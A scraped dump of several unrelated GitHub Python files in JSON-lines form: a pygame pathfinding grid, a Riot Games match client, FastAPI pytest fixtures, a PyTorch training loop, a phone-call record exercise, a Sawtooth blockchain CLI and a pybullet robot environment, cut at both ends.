int(input(\"Please enter a number digits to find the larges palindrome product :\"))\n print(largest_palindrome_product(num))\n\nif __name__ == '__main__':\n main()\n","repo_name":"azharahamed/my-first-python-learning","sub_path":"projecteuler/largest_palindrome_product.py","file_name":"largest_palindrome_product.py","file_ext":"py","file_size_in_byte":915,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"3121921669","text":"import pygame\nfrom cell import Cell\n\nclass Grid:\n\tdef __init__(self, screenWidth, screenHeight, cellSize, startX, startY, endX, endY):\n\t\tself.cellSize = cellSize\n\t\tself.nbCol = int(screenWidth / cellSize)\n\t\tself.nbRow = int(screenHeight / cellSize)\n\n\t\tself.grid = [[Cell(x, y) for x in range(self.nbCol)] for y in range(self.nbRow)]\n\t\tself.grid[startX][startY].setStart()\n\t\tself.grid[endX][endY].setEnd()\n\n\tdef getCell(self, x, y):\n\t\treturn self.grid[int(y)][int(x)]\n\n\tdef handleLeftClick(self, x, y):\n\t\tself.getCell(x / self.cellSize, y / self.cellSize).setWall()\n\n\tdef handleRightClick(self, x, y):\n\t\tself.getCell(x / self.cellSize, y / self.cellSize).setFree()\n\n\tdef draw(self, screen):\n\t\tfor row, cells in enumerate(self.grid):\n\t\t\tfor col, cell in enumerate(cells):\n\t\t\t\trect = pygame.Rect(col * self.cellSize, row * self.cellSize, self.cellSize - 1, 
self.cellSize - 1)\n\t\t\t\tpygame.draw.rect(screen, cell.getColor(), rect)\n\n\t\tmousePos = pygame.mouse.get_pos()\n\t\tcell = self.getCell(mousePos[0] / self.cellSize, mousePos[1] / self.cellSize)\n\t\tfont = pygame.font.SysFont('Arial', 12, bold = True)\n\t\ttext = font.render('Score: ' + str(cell.score) + ', Start: ' + str(cell.startDistance) + ', End: ' + str(cell.endDistance), True, 'Red', 'Black')\n\t\tscreen.blit(text, ((mousePos[0], mousePos[1] - text.get_height())))\n","repo_name":"WarTey/pathfinder","sub_path":"grid.py","file_name":"grid.py","file_ext":"py","file_size_in_byte":1315,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"39401801023","text":"from pprint import pprint\n\nimport requests\n\nfrom getLol.model.Player import Player\nfrom getLol.model.ParticipantIdentity import ParticipantIdentity\nfrom getLol.model.Ban import Ban\nfrom getLol.model.Equipe import Equipe\n\n\nclass Match:\n\n season = ''\n queue = ''\n id = ''\n identidadeParticipantes = []\n versao_jogo = ''\n id_plataforma = ''\n modo_jogo = ''\n id_mapa = ''\n tipo_jogo = ''\n equipes = []\n participantes = []\n duracao = ''\n criacao = ''\n mensagem = 200\n\n def __init__(self, conexao):\n self.conexao = conexao\n\n def getMatchById(self, id, regiao='br1'):\n url = 'https://' + regiao + '.api.riotgames.com/lol/match/v4/matches/' + id + '?api_key=' + self.conexao.key\n retorno = requests.get(url)\n\n if retorno.status_code == 200:\n resultado = retorno.json()\n\n self.season = resultado['seasonId']\n self.queue = resultado['queueId']\n self.id = resultado['gameId']\n identidadeParts = []\n\n for part in resultado['participantIdentities']:\n player = Player(\n part['player']['currentPlatformId'],\n part['player']['summonerName'],\n part['player']['matchHistoryUri'],\n part['player']['platformId'],\n part['player']['currentAccountId'],\n part['player']['profileIcon'],\n part['player']['summonerId'],\n part['player']['accountId']\n )\n participant_identity = ParticipantIdentity(player, part['participantId'])\n identidadeParts.append(participant_identity)\n self.identidadeParticipantes = identidadeParts\n self.versao_jogo = resultado['gameVersion']\n self.id_plataforma = resultado['platformId']\n self.modo_jogo = resultado['gameMode']\n self.id_mapa = resultado['mapId']\n self.tipo_jogo = resultado['gameType']\n\n equipes = []\n for equipe in resultado['teams']:\n bans = []\n for ban in equipe['bans']:\n ban_o = Ban(ban['pickTurn'], ban['championId'])\n bans.append(ban_o)\n eq = Equipe(equipe['firstDragon'], equipe['firstInhibitor'], bans, equipe['baronKills'],\n equipe['firstRiftHerald'], equipe['firstBaron'], equipe['riftHeraldKills'],\n equipe['firstBlood'], int(equipe['teamId']), equipe['firstTower'],\n equipe['vilemawKills'], equipe['inhibitorKills'], equipe['towerKills'],\n equipe['dominionVictoryScore'], equipe['win'], equipe['dragonKills'])\n equipes.append(eq)\n\n self.equipes = equipes\n\n self.participantes = resultado['participants']\n self.duracao = resultado['gameDuration']\n self.criacao = resultado['gameCreation']\n\n return self\n else:\n self.message = retorno.status_code\n return self\n","repo_name":"Erkmann/getLOL","sub_path":"getLol/model/Match.py","file_name":"Match.py","file_ext":"py","file_size_in_byte":3229,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"16237807617","text":"import asyncio\nimport os\nfrom io import BytesIO\nfrom typing import AsyncGenerator, 
Generator\n\nimport pytest\nimport pytest_asyncio\nfrom fastapi import UploadFile\nfrom httpx import AsyncClient\nfrom sqlalchemy.ext.asyncio import AsyncConnection, AsyncSession, create_async_engine\nfrom sqlalchemy.orm import sessionmaker\n\nfrom src import crud\nfrom src.api.deps import get_session\nfrom src.core.config import settings\nfrom src.db.base import Base\nfrom src.main import app\nfrom src.models import Twit, User\n\nengine = create_async_engine(\n settings.TEST_SQLALCHEMY_DATABASE_URI, echo=False # type: ignore\n)\nsession = sessionmaker(engine, class_=AsyncSession, expire_on_commit=False)\n\n\nUSER_API_KEY = 'test11'\n\n\n@pytest.fixture(scope=\"session\")\ndef event_loop() -> Generator:\n \"\"\"\n Creates an instance of the default event loop for the test session.\n \"\"\"\n loop = asyncio.new_event_loop()\n yield loop\n loop.close()\n\n\n@pytest_asyncio.fixture\nasync def db_setup() -> AsyncGenerator:\n \"\"\"\n Create database models and drop after test session\n :return:\n \"\"\"\n try:\n async with engine.begin() as conn:\n await conn.run_sync(Base.metadata.create_all)\n await init_fixture_database()\n yield\n finally:\n async with engine.begin() as conn:\n await conn.run_sync(Base.metadata.drop_all)\n\n\n@pytest_asyncio.fixture\nasync def db(db_setup: AsyncConnection) -> AsyncGenerator:\n \"\"\"\n Create session before every test and rollback changes of this session at the end.\n \"\"\"\n async with session() as sess:\n yield sess\n await sess.rollback()\n\n\n@pytest_asyncio.fixture(scope=\"module\")\nasync def client() -> AsyncGenerator:\n async with AsyncClient(app=app, base_url='http://localhost') as c:\n yield c\n\n\nasync def override_get_db():\n async with session() as sess:\n yield sess\n\n\nasync def init_fixture_database() -> None:\n async with session() as sess:\n async with sess.begin():\n user = User(name='Fix', key=USER_API_KEY)\n twit = Twit(tweet_data='text', user_id=1)\n sess.add_all([user, twit])\n await sess.commit()\n\n\n@pytest.fixture\ndef user_api_key() -> dict:\n return {'api-key': USER_API_KEY}\n\n\n@pytest.fixture\ndef file_fixture(request):\n name = request.param\n file_name = '%s%s' % (settings.MEDIA_ROOT, name)\n open(file_name, 'w').close()\n yield name\n os.remove(file_name)\n\n\n@pytest_asyncio.fixture\nasync def uploaded_file():\n filename = 'asdfjhasdfk.jpeg'\n yield UploadFile(filename, BytesIO(b'binary_data'), content_type='image/jpeg')\n os.remove(os.path.join(settings.MEDIA_ROOT, filename))\n\n\n@pytest_asyncio.fixture\nasync def twit_with_media():\n from src.tests.factories import MediaFactory, TwitFactory\n\n media = await MediaFactory.create()\n twit = TwitFactory.build()\n obj_in = twit.to_json()\n obj_in.pop('user_id')\n obj_in['tweet_media_ids'] = [media.id]\n return obj_in\n\n\n@pytest_asyncio.fixture\nasync def users_twits():\n from src.tests.factories import FollowFactory, TwitFactory, UserFactory\n\n user_1 = await UserFactory.create()\n user_2 = await UserFactory.create()\n user_3 = await UserFactory.create()\n await TwitFactory.create(user=user_1)\n await TwitFactory.create(user=user_1)\n await TwitFactory.create(user=user_2)\n await TwitFactory.create(user=user_3)\n await FollowFactory.create(follower=user_2, following=user_1)\n await FollowFactory.create(follower=user_1, following=user_2)\n await FollowFactory.create(follower=user_3, following=user_2)\n return user_1, user_2\n\n\n@pytest_asyncio.fixture\nasync def user_info(db):\n from src.tests.factories import UserFactory\n\n user = await UserFactory.create()\n 
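# NOTE: one follower and two followings are created below, so the expected JSON\n    # exercises both directions of the follow relation.\n    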
follower = await UserFactory.create()\n following = await UserFactory.create()\n following_2 = await UserFactory.create()\n await crud.follow.follow_user(\n db, follower_user_id=follower.id, following_user_id=user.id\n )\n await crud.follow.follow_user(\n db, follower_user_id=user.id, following_user_id=following.id\n )\n await crud.follow.follow_user(\n db, follower_user_id=user.id, following_user_id=following_2.id\n )\n json_response = {\n 'result': True,\n 'user': {\n 'name': user.name,\n 'id': user.id,\n 'followers': [\n {'name': follower.name, 'id': follower.id},\n ],\n 'following': [\n {'name': following.name, 'id': following.id},\n {'name': following_2.name, 'id': following_2.id},\n ],\n },\n }\n return user, follower, following, following_2, json_response\n\n\napp.dependency_overrides[get_session] = override_get_db\n","repo_name":"ksayer/twitter_fastapi","sub_path":"src/tests/conftest.py","file_name":"conftest.py","file_ext":"py","file_size_in_byte":4749,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"24596495725","text":"import torch\nfrom tqdm import tqdm\ndef train_model(model,optimizer,epochs,criterion,trainloader,validation_loader=None,device='cuda',checkpoint=None):\n \"\"\"\n\n Args:\n model(nn.Module):\n optimizer(nn.optim):\n criterion(nn.CrossEntropy)\n trainloader(torch.utils.data.Dataloader):\n validation_loader(torch.utils.data.Dataloader):\n device(torch.device):\n checkpoint(str): \n \"\"\" \n if checkpoint is not None:\n state_dict = torch.load(checkpoint)\n model.load_state_dict(state_dict)\n print('Starting training from checkpoint')\n #check how to load optimizer in checkpoint\n #Implement that later\n for epoch in tqdm(range(epochs)):\n \n model.train()\n running_loss = 0.0\n total = 0\n correct = 0.0\n for idx , mini_batch in tqdm(enumerate(trainloader)):\n imgs , labels = mini_batch\n imgs = imgs.to(device)\n labels = labels.to(device)\n labels = labels.long()\n output = model(imgs)\n _ , preds = torch.max(output,1)\n optimizer.zero_grad()\n loss = criterion(output,labels)\n loss.backward()\n optimizer.step()\n running_loss +=loss.item()\n total += labels.size(0)\n correct += (preds == labels).sum().item()\n\n print(f'Train: Epoch:{epoch} Loss:{running_loss / total} Accuracy:{100 * correct / total }')\n\n model.eval()\n eval_loss = 0.0\n eval_correct = 0.0\n total = 0\n correct = 0.0\n for idx , mini_batches in tqdm(enumerate(validation_loader)):\n imgs , labels = mini_batches\n imgs = imgs.to(device)\n labels = labels.to(device).long()\n output = model(imgs)\n _ , preds = torch.max(output,1)\n loss = criterion(output,labels)\n eval_loss += loss.item()\n correct += (preds == labels).sum().item()\n total += labels.size(0)\n \n print(f'Test: Epoch:{epoch} Loss:{eval_loss / total}, Eval_Accuracy{100* correct/ total}')\n \n if(epoch%5==0):\n torch.save(model.state_dict(),f'model{epoch}.pth')\n\n return model","repo_name":"UsamaHasan/DistractedDriverClassification","sub_path":"src/utils/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":2249,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"12850013456","text":"\"\"\"\nRead file into texts and calls.\nIt's ok if you don't understand how to read files.\n\"\"\"\nimport csv\n\nwith open('texts.csv', 'r') as f:\n reader = csv.reader(f)\n texts = list(reader)\n\nwith open('calls.csv', 'r') as f:\n reader = csv.reader(f)\n calls = list(reader)\n\n\"\"\"\nTASK 3:\n(080) is the area 
code for fixed line telephones in Bangalore.\nFixed line numbers include parentheses, so Bangalore numbers\nhave the form (080)xxxxxxx.)\n\nPart A: Find all of the area codes and mobile prefixes called by people\nin Bangalore.\n - Fixed lines start with an area code enclosed in brackets. The area\n   codes vary in length but always begin with 0.\n - Mobile numbers have no parentheses, but have a space in the middle\n   of the number to help readability. The prefix of a mobile number\n   is its first four digits, and they always start with 7, 8 or 9.\n - Telemarketers' numbers have no parentheses or space, but they start\n   with the area code 140.\n\nPrint the answer as part of a message:\n\"The numbers called by people in Bangalore have codes:\"\n \nThe list of codes should be printed out one per line in lexicographic order with no duplicates.\n\nPart B: What percentage of calls from fixed lines in Bangalore are made\nto fixed lines also in Bangalore? In other words, of all the calls made\nfrom a number starting with \"(080)\", what percentage of these calls\nwere made to a number also starting with \"(080)\"?\n\nPrint the answer as a part of a message:\n\" percent of calls from fixed lines in Bangalore are calls\nto other fixed lines in Bangalore.\"\nThe percentage should have 2 decimal digits\n\"\"\"\n\ndef get_unique_numbers_called_by_area_code(area_code, calls):\n    \"\"\"\n    This function returns a list of area codes called by a specific area code.\n\n    INPUT:\n    area_code: the area code where we want to filter the list\n    calls: the list of calls\n\n    RETURN: a list of numbers called by a specific area code.\n    \"\"\"\n\n    # I have chosen set as my data collection because for this problem the order doesn't matter. Set holds unique hashable objects like strings.\n    # Creating the set - O(1)\n    called_numbers = set()\n    \n    # the index for iterating the list of calls. It starts on 0 - O(1)\n    index = 0\n\n    # iterating over the list of calls - O(n)\n    # this has a complexity of O(n), because it is iterating over the whole list.\n    while index < len(calls):\n        # compare if the caller number starts with the area code - O(1)\n        if calls[index][0].startswith(area_code):\n            # if the caller number starts with the area code, then the receiver number is added to the set - O(1)\n            # Also, the filter_area_codes function is called to filter just the area code of the receiver number. \n            called_numbers.add(filter_area_codes(calls[index][1]))\n        \n        # increasing the index by 1 - O(1)\n        index += 1\n\n    # returning a list of area codes based on the set - O(1)\n    return list(called_numbers)\n\ndef get_number_of_calls_from_area_code(area_code, calls):\n    \"\"\"\n    This function returns the number of calls from a specific area code.\n\n    INPUT:\n    area_code: the area code where we want to filter the list\n    calls: the list of calls\n\n    RETURN: the number of calls\n    \"\"\"\n    # the index for iterating the list of calls. It starts on 0 - O(1)\n    index = 0\n    # the number of calls, in this case starts with 0 - O(1)\n    number_of_calls = 0\n\n    # iterating over the list of calls - O(n)\n    # this has a complexity of O(n), because it is iterating over the whole list.\n    while index < len(calls):\n        # compare if the caller number starts with the area code - O(1)\n        if calls[index][0].startswith(area_code):\n            # if the caller number starts with the area code, then the number of calls is increased - O(1)\n            number_of_calls += 1\n        \n        # increasing the index by 1 - O(1)\n        index += 1\n\n    # returning the number of calls - O(1)\n    return number_of_calls\n\ndef filter_area_codes(number):\n    \"\"\"\n    This function returns the area code of a given phone number.\n\n    INPUT:\n    number: a phone number. \n\n    RETURN: the area code if it's a valid phone number.\n    \"\"\"\n    # True in case the phone number starts with ( - O(1)\n    if number.startswith('('):\n        # returns the area code - O(1)\n        return number[:number.find(')')+1]\n    # True in case the phone number has a space in the middle - O(1)\n    elif number.find(' ') > 0:\n        # True in case the phone number starts with 7 or 8 or 9 - O(1)\n        if number.startswith('7') or number.startswith('8') or number.startswith('9'): \n            # returns the area code - O(1)\n            return number[:4]\n    # True if none of above - O(1)\n    else:\n        # returns an error.\n        return \"Invalid phone number\"\n    \ndef print_lex_ordered_numbers(numbers):\n    \"\"\"\n    This function sorts a list of numbers in lexicographic order and prints each number.\n\n    INPUT: \n    numbers: a list of numbers. \n\n    RETURN: None, this function doesn't return anything.\n    \"\"\"\n    # sorting the list in lexicographic order - O(nlogn)\n    # this has a complexity of O(nlogn), because it is sorting the whole list.\n    numbers.sort()\n    # iterating the list to print the ordered numbers - O(n)\n    for number in numbers:\n        print(number)\n\ndef get_numbers_called_by_same_area_code(area_code, calls):\n    \"\"\"\n    This function iterates a list of calls and fills a list with the numbers that match the area code.\n\n    INPUT: \n    area_code: the area code that filters the list. \n    calls: a list of numbers. \n\n    RETURN: the length of the list of numbers that called other numbers with the same area code.\n    \"\"\"\n    # creating a list to store unique numbers - O(1)\n    called_numbers = list()\n    # starting the index with 0 - O(1)\n    index = 0\n    # iterating over the calls - O(n)\n    while index < len(calls):\n        # compare if the caller number starts with the area code - O(1)\n        if calls[index][0].startswith(area_code) and calls[index][1].startswith(area_code):\n            # adding the caller number to the list - O(1)\n            called_numbers.append(calls[index][0])\n        # incrementing the index by 1 - O(1)\n        index += 1\n    \n    # returning the length of the called numbers - O(1)\n    return len(called_numbers)\n\ndef get_percentage_from_fixed_lines(number_of_calls_from_Bangalore, number_of_calls_from_Bangalore_to_Bangalore):\n    \"\"\"\n    This function gets the percentage of calls from fixed lines in Bangalore that are made \n    to fixed lines also in Bangalore\n\n    INPUT:\n    number_of_calls_from_Bangalore: number of calls from fixed lines in Bangalore. \n    number_of_calls_from_Bangalore_to_Bangalore: number of calls from fixed lines in Bangalore to \n        fixed lines in Bangalore. \n\n    RETURN: the percentage of calls from fixed lines in Bangalore that are made \n        to fixed lines also in Bangalore\n    \"\"\"\n    # getting the percentage. 
- O(1)\n    return (number_of_calls_from_Bangalore_to_Bangalore * 100) / number_of_calls_from_Bangalore\n\ndef main():\n    # Part A solution\n    # defining the area code for Bangalore. - O(1)\n    area_code = \"(080)\"\n\n    # printing the solution message. - O(1)\n    print(\"The numbers called by people in Bangalore have codes:\")\n\n    # getting all of the area codes and mobile prefixes called by people in Bangalore. - O(n)\n    unique_numbers_from_Bangalore = get_unique_numbers_called_by_area_code(area_code, calls)\n    \n    # ordering and printing the list of calls from Bangalore. - O(nlogn)\n    print_lex_ordered_numbers(unique_numbers_from_Bangalore)\n\n    \n    # Part B solution\n    # getting the number of calls from Bangalore - O(n)\n    number_of_calls_from_bangalore = get_number_of_calls_from_area_code(area_code, calls)\n\n    # getting the number of calls from fixed lines in Bangalore to other fixed lines in Bangalore - O(n)\n    number_of_calls_from_Bangalore_to_Bangalore = get_numbers_called_by_same_area_code(area_code, calls)\n\n    # calculating the percentage of calls from fixed lines in Bangalore that are calls to other fixed lines in Bangalore - O(1)\n    percentage = get_percentage_from_fixed_lines(number_of_calls_from_bangalore, number_of_calls_from_Bangalore_to_Bangalore)\n    \n    # printing the solution message\n    print(\"{:.2f} percent of calls from fixed lines in Bangalore are calls to other fixed lines in Bangalore.\"\n          .format(percentage))\n\nif __name__ == \"__main__\":\n    main()\n\n\n\n\n'''\n# UNIT TESTING\n# get_numbers_called_by_area_code test\n# four numbers with one caller from Bangalore\ncalls_test_list1 = [[\"(080)47459867\", \"98440 65896\"], [\"90087 42537\", \"(080)35121497\"], \n                    [\"(044)30727085\", \"92414 22596\"], [\"97447 92655\", \"(022)39006198\"]]\n#assert(get_numbers_called_by_area_code(\"(080)\", calls_test_list1) == [\"98440 65896\"])\n# four numbers with two callers from Bangalore\ncalls_test_list2 = [[\"(080)47459867\", \"98440 65896\"], [\"90087 42537\", \"(080)35121497\"], \n                    [\"(044)30727085\", \"92414 22596\"], [\"(080)23802940\", \"98445 71741\"]]\n#assert(get_numbers_called_by_area_code(\"(080)\", calls_test_list2) == [\"98445 71741\", \"98440 65896\"])\n# six numbers with three callers in Bangalore and two are duplicated\ncalls_test_list3 = [[\"(080)47459867\", \"98440 65896\"], [\"90087 42537\", \"(080)35121497\"], \n                    [\"(044)30727085\", \"92414 22596\"], [\"(080)23802940\", \"98445 71741\"],\n                    [\"78130 00821\", \"98453 94494\"], [\"(080)23802940\", \"90352 50054\"]]\n#assert(get_numbers_called_by_area_code(\"(080)\", calls_test_list3) == [\"90352 50054\", \"98445 71741\", \"98440 65896\"])\n# six numbers with three callers from Bangalore and two receivers are duplicated\ncalls_test_list4 = [[\"(080)47459867\", \"98440 65896\"], [\"90087 42537\", \"(080)35121497\"], \n                    [\"(044)30727085\", \"92414 22596\"], [\"(080)23802940\", \"98445 71741\"],\n                    [\"78130 00821\", \"98453 94494\"], [\"(080)67362492\", \"98440 65896\"]]\n#assert(get_numbers_called_by_area_code(\"(080)\", calls_test_list4) == [\"98445 71741\", \"98440 65896\"])\n# four numbers with no caller from Bangalore\ncalls_test_list5 = [[\"98440 65896\", \"(080)47459867\"], [\"90087 42537\", \"(080)35121497\"], \n                    [\"(044)30727085\", \"92414 22596\"], [\"97447 92655\", \"(022)39006198\"]]\n#assert(get_numbers_called_by_area_code(\"(080)\", calls_test_list5) == [])\nprint(\"test for get_numbers_called_by_area_code passed\")\n\n# print_lex_ordered_numbers test\n# test with eight numbers on the list\norder_test_list1 = [\"(080)47459867\", 
\"98440 65896\", \"90087 42537\", \"(080)35121497\", \n                    \"(044)30727085\", \"92414 22596\", \"97447 92655\", \"(022)39006198\"]\nprint_lex_ordered_numbers(order_test_list1)\nprint(\"test for print_lex_ordered_numbers passed\")\n\n# get_numbers_called_by_same_area_code test\n# test with six call pairs, two callers from Bangalore and one receiver from Bangalore\nbangalore_calls_test_list1 = [[\"(080)47459867\", \"98440 65896\"], [\"90087 42537\", \"(0471)6537077\"], \n                              [\"(044)30727085\", \"92414 22596\"], [\"(080)23802940\", \"(080)35121497\"],\n                              [\"78130 00821\", \"98453 94494\"], [\"98453 46196\", \"90352 50054\"]]\nassert(get_numbers_called_by_same_area_code(\"(080)\", bangalore_calls_test_list1) == 1)\n# test with six call pairs, two callers from Bangalore and two receivers from Bangalore\nbangalore_calls_test_list2 = [[\"(080)64765396\", \"(080)47459867\"], [\"90087 42537\", \"(0471)6537077\"], \n                              [\"(044)30727085\", \"92414 22596\"], [\"(080)23802940\", \"(080)35121497\"],\n                              [\"78130 00821\", \"98453 94494\"], [\"98453 46196\", \"90352 50054\"]]\nassert(get_numbers_called_by_same_area_code(\"(080)\", bangalore_calls_test_list2) == 2)\n# four numbers with no caller from Bangalore\nbangalore_calls_test_list3 = [[\"98440 65896\", \"(080)47459867\"], [\"90087 42537\", \"(080)35121497\"], \n                              [\"(044)30727085\", \"92414 22596\"], [\"97447 92655\", \"(022)39006198\"]]\nassert(get_numbers_called_by_same_area_code(\"(080)\", bangalore_calls_test_list3) == 0)\nprint(\"test for get_numbers_called_by_same_area_code passed\")\n\n# test filter_area_codes\n# test with a fixed number\nassert(filter_area_codes(\"(044)30727085\") == \"(044)\")\n# test with a cellphone\nassert(filter_area_codes(\"98440 65896\") == \"9844\")\n# test with a telemarketing number\nassert(filter_area_codes(\"1409994233\") == \"Invalid phone number\")\nprint(\"test for filter_area_codes passed\")\n\n# test get_percentage_from_fixed_lines\nassert(get_percentage_from_fixed_lines(8, 4) == 50)\nassert(get_percentage_from_fixed_lines(10, 2) == 20)\nassert(get_percentage_from_fixed_lines(10, 3) == 30)\nassert(get_percentage_from_fixed_lines(10, 0) == 0)\nprint(\"test for get_percentage_from_fixed_lines passed\")\n'''","repo_name":"marcotello/PythonPractices","sub_path":"P0/Task3.py","file_name":"Task3.py","file_ext":"py","file_size_in_byte":13256,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"41045315707","text":"#!/bin/python3\nfrom sesame_query import SesameQuery\n\n# Instantiate the SesameQuery class\nmyquery = SesameQuery()\n\n# Search for the object \"HD-123\"\nresult = myquery.search(\"HD-123\")\n\n# Print the complete results\nfor key, value in result.items():\n    print(f\"{key}: {value}\")\n","repo_name":"barbierimauro/AstronomerHelper","sub_path":"CDSaddons/example_sesame.py","file_name":"example_sesame.py","file_ext":"py","file_size_in_byte":277,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"19982470449","text":"import argparse\nimport getpass\nimport logging\nimport os\nimport sys\nimport traceback\nimport 
pkg_resources\n\nfrom colorlog import ColoredFormatter\n\nfrom api.client import AirAnchorClient, AirAnchorQueryClient\n\n\nDISTRIBUTION_NAME = 'AirAnchor-api'\n\nDEFAULT_SAWTOOTH = 'http://127.0.0.1:8008'\nDEFAULT_RABBITMQ = \"http://127.0.0.1:8654\"\n\n\ndef create_console_handler(verbose_level):\n    clog = logging.StreamHandler()\n    formatter = ColoredFormatter(\n        \"%(log_color)s[%(asctime)s %(levelname)-8s%(module)s]%(reset)s \"\n        \"%(white)s%(message)s\",\n        datefmt=\"%H:%M:%S\",\n        reset=True,\n        log_colors={\n            'DEBUG': 'cyan',\n            'INFO': 'green',\n            'WARNING': 'yellow',\n            'ERROR': 'red',\n            'CRITICAL': 'red',\n        })\n\n    clog.setFormatter(formatter)\n\n    if verbose_level == 0:\n        clog.setLevel(logging.WARN)\n    elif verbose_level == 1:\n        clog.setLevel(logging.INFO)\n    else:\n        clog.setLevel(logging.DEBUG)\n\n    return clog\n\n\ndef setup_loggers(verbose_level):\n    logger = logging.getLogger()\n    logger.setLevel(logging.DEBUG)\n    logger.addHandler(create_console_handler(verbose_level))\n\n\ndef create_parent_parser(prog_name):\n    parent_parser = argparse.ArgumentParser(prog=prog_name, add_help=False)\n    parent_parser.add_argument(\n        '-v', '--verbose',\n        action='count',\n        help='enable more verbose output')\n    \n    parent_parser.add_argument(\n        '--priv-key',\n        type=str,\n        help='private key path'\n    )\n\n    try:\n        version = pkg_resources.get_distribution(DISTRIBUTION_NAME).version\n    except pkg_resources.DistributionNotFound:\n        version = 'UNKNOWN'\n\n    parent_parser.add_argument(\n        '-V', '--version',\n        action='version',\n        version=(DISTRIBUTION_NAME + ' (Hyperledger Sawtooth) version {}')\n        .format(version),\n        help='display version information')\n\n    return parent_parser\n\n\ndef create_parser(prog_name):\n    parent_parser = create_parent_parser(prog_name)\n\n    parser = argparse.ArgumentParser(\n        parents=[parent_parser],\n        formatter_class=argparse.RawDescriptionHelpFormatter)\n\n    subparsers = parser.add_subparsers(title='subcommands', dest='command')\n\n    add_set_parser(subparsers, parent_parser)\n    add_show_parser(subparsers, parent_parser)\n    add_list_parser(subparsers, parent_parser)\n\n    return parser\n\n\ndef add_set_parser(subparsers, parent_parser):\n    message = 'Sends an intkey transaction to set <key> to <value>.'\n\n    parser = subparsers.add_parser(\n        'set',\n        parents=[parent_parser],\n        description=message,\n        help='Sends a registration petition to store in the blockchain')\n\n    parser.add_argument(\n        'data',\n        type=str,\n        help='data as plain text to register')\n    \n    parser.add_argument(\n        '--rabbitmq',\n        type=str,\n        default=DEFAULT_RABBITMQ,\n        help='specify URL of rabbitmq' \n    )\n\n\ndef do_set(args):\n    data, rabbitmq_url, key_file = args.data, args.rabbitmq, args.priv_key\n    \n    client = AirAnchorClient(\n        rabbitmq_url=rabbitmq_url,\n        priv_path=key_file)\n    \n    result = client.do_location(data)\n    print(result)\n\n\ndef add_show_parser(subparsers, parent_parser):\n    message = 'Shows the data stored for a specific <key> and <hash>.'\n\n    parser = subparsers.add_parser(\n        'show',\n        parents=[parent_parser],\n        description=message,\n        help='Displays the specified data linked to a key and hash')\n    \n    parser.add_argument(\n        'key',\n        type=str,\n        help='public key of the client that sent the transaction')\n\n    parser.add_argument(\n        'hash',\n        type=str,\n        help='the hash of the transaction')\n    \n    parser.add_argument(\n        '--url',\n        type=str,\n        default=DEFAULT_SAWTOOTH,\n        help='specify URL of REST API')\n\n\ndef do_show(args):\n    key, hash, url = args.key, args.hash, args.url\n    \n    client = AirAnchorQueryClient(url)\n    \n    value = client.do_show(key, hash)\n    \n    print('{}: 
{}'.format(hash, value))\n\n\ndef add_list_parser(subparsers, parent_parser):\n message = 'Shows the values of all keys in intkey state.'\n\n parser = subparsers.add_parser(\n 'list',\n parents=[parent_parser],\n description=message,\n help='Displays all data stored by a client')\n\n parser.add_argument(\n 'key',\n type=str,\n help='public key of the client to look up for')\n \n parser.add_argument(\n '--url',\n type=str,\n default=DEFAULT_SAWTOOTH,\n help='specify URL of REST API')\n\n\ndef do_list(args):\n key, url = args.key, args.url\n \n client = AirAnchorQueryClient(url)\n \n results = client.do_list(key)\n \n for pair in results:\n for name, value in pair.items():\n print('{}: {}'.format(name, value))\n\n\ndef main(prog_name=os.path.basename(sys.argv[0]), args=None):\n if args is None:\n args = sys.argv[1:]\n parser = create_parser(prog_name)\n args = parser.parse_args(args)\n\n if args.verbose is None:\n verbose_level = 0\n else:\n verbose_level = args.verbose\n setup_loggers(verbose_level=verbose_level)\n\n if not args.command:\n parser.print_help()\n sys.exit(1)\n \n commands = {\n 'set': do_set,\n 'show': do_show,\n 'list': do_list\n }\n\n commands[args.command](args)\n\n\ndef main_wrapper():\n # pylint: disable=bare-except\n try:\n main()\n except Exception as err:\n print(\"Error: {}\".format(err), file=sys.stderr)\n traceback.print_exc(file=sys.stderr)\n sys.exit(1)\n except KeyboardInterrupt:\n pass\n except SystemExit as e:\n raise e\n except:\n traceback.print_exc(file=sys.stderr)\n sys.exit(1)","repo_name":"divios/AirAnchor-API","sub_path":"api/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":5843,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"932006117","text":"import sys\nfrom pathlib import Path\n\nimport numpy as np\nimport pybullet as p\nimport pybullet_data as pd\nimport pybullet_utils.bullet_client as bc\nfrom gym import spaces\n\nsys.path.append(str(Path(__file__).resolve().parents[0]))\nfrom environment import Environment\n\nsys.path.append(str(Path(__file__).resolve().parents[1]))\ntry:\n from .environments_robot_task.robots import get_robot\n from .environments_robot_task.tasks import get_task\nexcept:\n from environments_robot_task.robots import get_robot\n from environments_robot_task.tasks import get_task\n\nclass EnvironmentRobotTask(Environment):\n \"\"\"\n A class to combine a robot instance with a task instance\n to define a RL environment\n \"\"\"\n def __init__(self, robot_config, task_config, render=False,\n bullet_client=None, **kwargs):\n self.render = render\n\n self.task_config = task_config\n self.robot_config = robot_config\n\n if bullet_client is None:\n connection_mode = p.GUI if render else p.DIRECT\n\n bullet_client = bc.BulletClient(connection_mode)\n\n bullet_client.setAdditionalSearchPath(pd.getDataPath())\n\n time_step = 1. 
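The AirAnchor CLI record above wires argparse subparsers to handlers through a plain name-to-function dict; the same dispatch pattern reduced to a self-contained sketch (the command names here are invented):

```python
import argparse

def do_greet(args):
    print(f"hello, {args.name}")

def do_add(args):
    print(args.a + args.b)

def main(argv=None):
    parser = argparse.ArgumentParser(prog="demo")
    subparsers = parser.add_subparsers(title="subcommands", dest="command")

    greet = subparsers.add_parser("greet", help="print a greeting")
    greet.add_argument("name")

    add = subparsers.add_parser("add", help="add two integers")
    add.add_argument("a", type=int)
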